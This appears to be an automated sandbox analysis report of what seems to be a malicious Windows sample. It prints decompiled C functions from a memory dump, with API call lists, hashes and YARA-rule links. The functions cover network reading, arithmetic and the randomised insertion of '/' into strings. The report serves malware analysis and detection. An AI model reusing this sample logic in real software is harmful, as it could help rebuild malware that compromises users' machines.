									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x33fd230; // 0x2b2a5a8
												_t28 = _t108 + 0x33fe0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x33fd230; // 0x2b2a5a8
														_t33 = _t78 + 0x33fe078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                                                  0x033f14c2
                                                                                  0x033f14cb
                                                                                  0x033f14cc
                                                                                  0x033f14d0
                                                                                  0x033f14d6
                                                                                  0x033f14dc
                                                                                  0x033f14e5
                                                                                  0x033f14eb
                                                                                  0x033f14f5
                                                                                  0x033f14f7
                                                                                  0x033f14fd
                                                                                  0x033f1502
                                                                                  0x033f150d
                                                                                  0x033f1515
                                                                                  0x033f1518
                                                                                  0x033f163b
                                                                                  0x033f151e
                                                                                  0x033f151e
                                                                                  0x033f152b
                                                                                  0x033f1531
                                                                                  0x033f1537
                                                                                  0x033f153b
                                                                                  0x033f1541
                                                                                  0x033f154e
                                                                                  0x033f1552
                                                                                  0x033f1558
                                                                                  0x033f155b
                                                                                  0x033f1561
                                                                                  0x033f1567
                                                                                  0x033f156d
                                                                                  0x033f1570
                                                                                  0x033f1573
                                                                                  0x033f1579
                                                                                  0x033f1582
                                                                                  0x033f1588
                                                                                  0x033f1589
                                                                                  0x033f158c
                                                                                  0x033f158d
                                                                                  0x033f158e
                                                                                  0x033f1596
                                                                                  0x033f1597
                                                                                  0x033f1598
                                                                                  0x033f159a
                                                                                  0x033f159e
                                                                                  0x033f15a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f15a8
                                                                                  0x033f15b1
                                                                                  0x033f15b7
                                                                                  0x033f15c1
                                                                                  0x033f15c5
                                                                                  0x033f15c7
                                                                                  0x033f15d4
                                                                                  0x033f15d8
                                                                                  0x033f15e0
                                                                                  0x033f15e5
                                                                                  0x033f15f7
                                                                                  0x033f15f9
                                                                                  0x033f15ff
                                                                                  0x033f15ff
                                                                                  0x033f1608
                                                                                  0x033f1608
                                                                                  0x033f160a
                                                                                  0x033f1610
                                                                                  0x033f1610
                                                                                  0x033f1613
                                                                                  0x033f1619
                                                                                  0x033f161c
                                                                                  0x033f1625
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f1625
                                                                                  0x033f1579
                                                                                  0x033f1573
                                                                                  0x033f155b
                                                                                  0x033f162b
                                                                                  0x033f162b
                                                                                  0x033f1631
                                                                                  0x033f1631
                                                                                  0x033f1637
                                                                                  0x033f1637
                                                                                  0x033f1640
                                                                                  0x033f1646
                                                                                  0x033f1646
                                                                                  0x033f1502
                                                                                  0x033f164f

                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(033FC2C8), ref: 033F150D
                                                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 033F15EF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F1608
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F1637
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: String$Free$Alloclstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1885612795-0
                                                                                  • Opcode ID: 742403ffb6645ad21877b8464a8f8c0c7a8dafce2cc8100fd0c0b5fa9f4a9c4b
                                                                                  • Instruction ID: 7031bd39838088d3ca0c8f55a7575461ea694da1dc7d07ef4db97aadaeca4873
                                                                                  • Opcode Fuzzy Hash: 742403ffb6645ad21877b8464a8f8c0c7a8dafce2cc8100fd0c0b5fa9f4a9c4b
                                                                                  • Instruction Fuzzy Hash: AF514C75D0050AEFCB00DFA8D9C88AEF7B9FF88704B544594E915EB214D7359D02CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F44C2, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 85%
                                                                                  			E033F44C2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E033F43C6(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E033FA966(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E033F8B07(_t101,  &_v236, _a8, _t96 - _t81);
					E033F8B07(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E033FA966(_t101,  &E033FD168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E033FA966(_a16, _a4);
						E033F3A1E(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L033FAEE0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L033FAEDA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E033F47A0(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E033F337A(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E033F72D3(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E033FD168) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                  0x033f44c5
                                                                                  0x033f44d1
                                                                                  0x033f44d7
                                                                                  0x033f44dc
                                                                                  0x033f44e0
                                                                                  0x033f463d
                                                                                  0x033f4641
                                                                                  0x033f4641
                                                                                  0x033f44e6
                                                                                  0x033f44ea
                                                                                  0x033f44f0
                                                                                  0x033f44f1
                                                                                  0x033f44fc
                                                                                  0x033f4502
                                                                                  0x033f4507
                                                                                  0x033f450a
                                                                                  0x033f4524
                                                                                  0x033f4530
                                                                                  0x033f4539
                                                                                  0x033f4543
                                                                                  0x033f4548
                                                                                  0x033f454a
                                                                                  0x033f454d
                                                                                  0x033f45fb
                                                                                  0x033f4601
                                                                                  0x033f4612
                                                                                  0x033f4625
                                                                                  0x033f4635
                                                                                  0x00000000
                                                                                  0x033f463a
                                                                                  0x033f4556
                                                                                  0x033f455d
                                                                                  0x033f4561
                                                                                  0x033f4567
                                                                                  0x033f4569
                                                                                  0x033f456b
                                                                                  0x033f456d
                                                                                  0x033f456f
                                                                                  0x033f4579
                                                                                  0x033f457e
                                                                                  0x033f4580
                                                                                  0x033f4582
                                                                                  0x033f4583
                                                                                  0x033f4584
                                                                                  0x033f4585
                                                                                  0x033f458c
                                                                                  0x033f4593
                                                                                  0x033f4596
                                                                                  0x033f4596
                                                                                  0x033f4563
                                                                                  0x033f4563
                                                                                  0x033f4563
                                                                                  0x033f459e
                                                                                  0x033f45a6
                                                                                  0x033f45af
                                                                                  0x033f45b4
                                                                                  0x033f45b4
                                                                                  0x033f45b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f45bb
                                                                                  0x033f45be
                                                                                  0x033f45c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f45ca
                                                                                  0x033f45ca
                                                                                  0x033f45d4
                                                                                  0x033f45b4
                                                                                  0x033f45b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f45b9
                                                                                  0x033f45de
                                                                                  0x033f45e1
                                                                                  0x033f45e4
                                                                                  0x033f45eb
                                                                                  0x033f45eb
                                                                                  0x033f45f8
                                                                                  0x00000000
                                                                                  0x033f45f8
                                                                                  0x033f44f3
                                                                                  0x033f44f7
                                                                                  0x033f44f8
                                                                                  0x033f44fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f44fa
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 033F456F
                                                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 033F4585
                                                                                  • memset.NTDLL ref: 033F4625
                                                                                  • memset.NTDLL ref: 033F4635
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: memset$_allmul_aulldiv
                                                                                  • String ID:
                                                                                  • API String ID: 3041852380-0
                                                                                  • Opcode ID: 3ddc52d98494738c864ad3c10b37c0ee4f4191fa6e621a2f221ade9a97e3f5d4
                                                                                  • Instruction ID: 92bb86309113dbb38b792adc7de778681c7bad9eecd57bbc85aa815c7d453dac
                                                                                  • Opcode Fuzzy Hash: 3ddc52d98494738c864ad3c10b37c0ee4f4191fa6e621a2f221ade9a97e3f5d4
                                                                                  • Instruction Fuzzy Hash: E3418175A00249AFDB10EFA9DCC0BEF7779EF44310F808529EA19AB280DB709A55CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F43A3, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 57%
                                                                                  			E033F43A3(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x33fd138() != 0) {
								_v8 = 8;
							} else {
								_t47 = E033F75C4(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x33fd224, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E033F4C31(_v20);
											if(_v8 == 0) {
												_v8 = E033F4036(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E033F7F7F(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

























                                                                                  0x033f43a4
                                                                                  0x033f43aa
                                                                                  0x033f43b5
                                                                                  0x033f43b5
                                                                                  0x033f43b7
                                                                                  0x033f6e0b
                                                                                  0x033f6e0e
                                                                                  0x033f6e17
                                                                                  0x033f6e1a
                                                                                  0x033f6e1d
                                                                                  0x033f6e25
                                                                                  0x033f6f23
                                                                                  0x033f6f2e
                                                                                  0x033f6f31
                                                                                  0x033f6f33
                                                                                  0x00000000
                                                                                  0x033f6f33
                                                                                  0x033f6e2b
                                                                                  0x033f6e2e
                                                                                  0x033f6f36
                                                                                  0x033f6f36
                                                                                  0x033f6e34
                                                                                  0x033f6e37
                                                                                  0x033f6e38
                                                                                  0x033f6e3a
                                                                                  0x033f6e43
                                                                                  0x033f6f1a
                                                                                  0x033f6e49
                                                                                  0x033f6e4f
                                                                                  0x033f6e56
                                                                                  0x033f6e59
                                                                                  0x033f6f08
                                                                                  0x033f6e5f
                                                                                  0x00000000
                                                                                  0x033f6e5f
                                                                                  0x033f6e5f
                                                                                  0x033f6e5f
                                                                                  0x033f6e5f
                                                                                  0x033f6e64
                                                                                  0x033f6e66
                                                                                  0x033f6e66
                                                                                  0x033f6e73
                                                                                  0x033f6e7b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f6e7d
                                                                                  0x033f6e8a
                                                                                  0x033f6e90
                                                                                  0x033f6e90
                                                                                  0x033f6e93
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f6e95
                                                                                  0x033f6ea0
                                                                                  0x033f6eb4
                                                                                  0x033f6eea
                                                                                  0x033f6eb6
                                                                                  0x033f6eb6
                                                                                  0x033f6ebd
                                                                                  0x033f6ec5
                                                                                  0x00000000
                                                                                  0x033f6ec7
                                                                                  0x033f6ec7
                                                                                  0x033f6ed2
                                                                                  0x033f6ed5
                                                                                  0x033f6edc
                                                                                  0x00000000
                                                                                  0x033f6edc
                                                                                  0x033f6ed5
                                                                                  0x033f6ec5
                                                                                  0x033f6eed
                                                                                  0x033f6ef0
                                                                                  0x033f6ef8
                                                                                  0x033f6f03
                                                                                  0x033f6f03
                                                                                  0x00000000
                                                                                  0x033f6ef8
                                                                                  0x033f6e9d
                                                                                  0x00000000
                                                                                  0x033f6edf
                                                                                  0x033f6edf
                                                                                  0x00000000
                                                                                  0x033f6ee8
                                                                                  0x033f6f0f
                                                                                  0x033f6f0f
                                                                                  0x033f6f15
                                                                                  0x033f6f15
                                                                                  0x033f6e43
                                                                                  0x033f6e2e
                                                                                  0x033f6f40
                                                                                  0x033f43ac
                                                                                  0x033f43ac
                                                                                  0x033f43b3
                                                                                  0x033f43be
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f43b3

                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,033F6CD4,00000000,?), ref: 033F6EA7
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,033F6CD4,00000000,?,?), ref: 033F6EC7
                                                                                    • Part of subcall function 033F7F7F: wcstombs.NTDLL ref: 033F803F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                  • String ID:
                                                                                  • API String ID: 2344289193-0
                                                                                  • Opcode ID: 3854f220f741fbb8259aac6570a43e16baac37f40fc3746548201add4e5bace3
                                                                                  • Instruction ID: 8a256af8c3c0ecf3bd44da584bab50cd96d9a54c7bb4197aa13535dd785c9828
                                                                                  • Opcode Fuzzy Hash: 3854f220f741fbb8259aac6570a43e16baac37f40fc3746548201add4e5bace3
                                                                                  • Instruction Fuzzy Hash: 26413771900209EFDF20EFA5DAC59AEBBBCFB04349F9445AAE601E7250E7349A41DB10
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F71BA, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 68%
                                                                                  			E033F71BA(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x33fd1f0, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x33fd208; // 0xddac9b47
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x33fd208 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                  0x033f71c2
                                                                                  0x033f71c5
                                                                                  0x033f71cb
                                                                                  0x033f71e3
                                                                                  0x033f71e7
                                                                                  0x033f71ea
                                                                                  0x033f71ec
                                                                                  0x033f71ef
                                                                                  0x033f71f1
                                                                                  0x033f71f4
                                                                                  0x033f71f6
                                                                                  0x033f71f6
                                                                                  0x033f71f8
                                                                                  0x033f7203
                                                                                  0x033f7208
                                                                                  0x033f7219
                                                                                  0x033f7221
                                                                                  0x033f7226
                                                                                  0x033f7229
                                                                                  0x033f722c
                                                                                  0x033f722e
                                                                                  0x033f7234
                                                                                  0x033f7237
                                                                                  0x033f7237
                                                                                  0x033f7237
                                                                                  0x033f7242
                                                                                  0x033f7247
                                                                                  0x033f7251

                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,033F14A0,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F71C5
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 033F71DD
                                                                                  • memcpy.NTDLL(00000000,05F29630,-00000008,?,?,?,033F14A0,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F7221
                                                                                  • memcpy.NTDLL(00000001,05F29630,00000001,033F6C79,00000000,05F29630), ref: 033F7242
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1819133394-0
                                                                                  • Opcode ID: 4193464e2d8220207a3381fb2afccb0d73d9997080f6d8db1fec21fc1a4f5ec9
                                                                                  • Instruction ID: 4cf17835ac548d89b56f458c740bf6ac4db27d72f4a0f59abf8f2ad59c68b8e6
                                                                                  • Opcode Fuzzy Hash: 4193464e2d8220207a3381fb2afccb0d73d9997080f6d8db1fec21fc1a4f5ec9
                                                                                  • Instruction Fuzzy Hash: 4D112972A00215BFD710EB69DCC8D9FBBBDEB85390F980276F505D7251E670DA0487A0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F752B, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 53%
                                                                                  			E033F752B(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E033F75C4(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x33fc2bc);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x33fc2bc);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                                                  0x033f7536
                                                                                  0x033f753a
                                                                                  0x033f753c
                                                                                  0x033f753d
                                                                                  0x033f7545
                                                                                  0x033f7545
                                                                                  0x033f7549
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f7540
                                                                                  0x033f7541
                                                                                  0x033f7544
                                                                                  0x033f7544
                                                                                  0x033f7551
                                                                                  0x033f7558
                                                                                  0x033f755c
                                                                                  0x033f7564
                                                                                  0x033f756a
                                                                                  0x033f756c
                                                                                  0x033f7571
                                                                                  0x033f7575
                                                                                  0x033f7577
                                                                                  0x033f757a
                                                                                  0x033f7581
                                                                                  0x033f7581
                                                                                  0x033f758b
                                                                                  0x033f758e
                                                                                  0x033f7591
                                                                                  0x033f7591
                                                                                  0x033f759d
                                                                                  0x033f759d
                                                                                  0x033f75aa

                                                                                  APIs
                                                                                  • StrChrA.SHLWAPI(?,00000020,00000000,05F2962C,?,?,?,033F5B5B,05F2962C,?,?,033F79CC), ref: 033F7545
                                                                                  • StrTrimA.SHLWAPI(?,033FC2BC,00000002,?,?,?,033F5B5B,05F2962C,?,?,033F79CC), ref: 033F7564
                                                                                  • StrChrA.SHLWAPI(?,00000020,?,?,?,033F5B5B,05F2962C,?,?,033F79CC,?,?,?,?,?,033F87DD), ref: 033F756F
                                                                                  • StrTrimA.SHLWAPI(00000001,033FC2BC,?,?,?,033F5B5B,05F2962C,?,?,033F79CC,?,?,?,?,?,033F87DD), ref: 033F7581
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Trim
                                                                                  • String ID:
                                                                                  • API String ID: 3043112668-0
                                                                                  • Opcode ID: 256d98d666cfd9b669be2ba6101566cb78dddb789715c8910e70faf3f81145a3
                                                                                  • Instruction ID: a7edada84d8ef77503dc3393b46ba3fcc6601ef428ea2e81719444dc5818de01
                                                                                  • Opcode Fuzzy Hash: 256d98d666cfd9b669be2ba6101566cb78dddb789715c8910e70faf3f81145a3
                                                                                  • Instruction Fuzzy Hash: CD01B5716453166FD221DE698CC8F3BBF9CEB85AE4F51055DFA45C7341EA60C80182E4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4200, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 53%
                                                                                  			E033F4200(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E033F5B70(_t8, _t1);
				_t16 = E033F75C4(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E033F39B5(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E033F75C4(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E033F4C31(_t16);
				}
				return _t18;
			}









                                                                                  0x033f420b
                                                                                  0x033f420c
                                                                                  0x033f420f
                                                                                  0x033f4211
                                                                                  0x033f421c
                                                                                  0x033f4220
                                                                                  0x033f4225
                                                                                  0x033f4229
                                                                                  0x033f4231
                                                                                  0x033f4236
                                                                                  0x033f423e
                                                                                  0x033f423e
                                                                                  0x033f4247
                                                                                  0x033f424b
                                                                                  0x033f4251
                                                                                  0x033f4254
                                                                                  0x033f425a
                                                                                  0x033f425a
                                                                                  0x033f4262
                                                                                  0x033f4262
                                                                                  0x033f4269
                                                                                  0x033f4269
                                                                                  0x033f4274

                                                                                  APIs
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                    • Part of subcall function 033F39B5: wsprintfA.USER32 ref: 033F3A11
                                                                                  • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,033F70CE,74666F53,00000000,?,00000000,?,?,033F79D7), ref: 033F4236
                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 033F425A
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F4262
                                                                                  Strings
                                                                                  Memory Dump Source
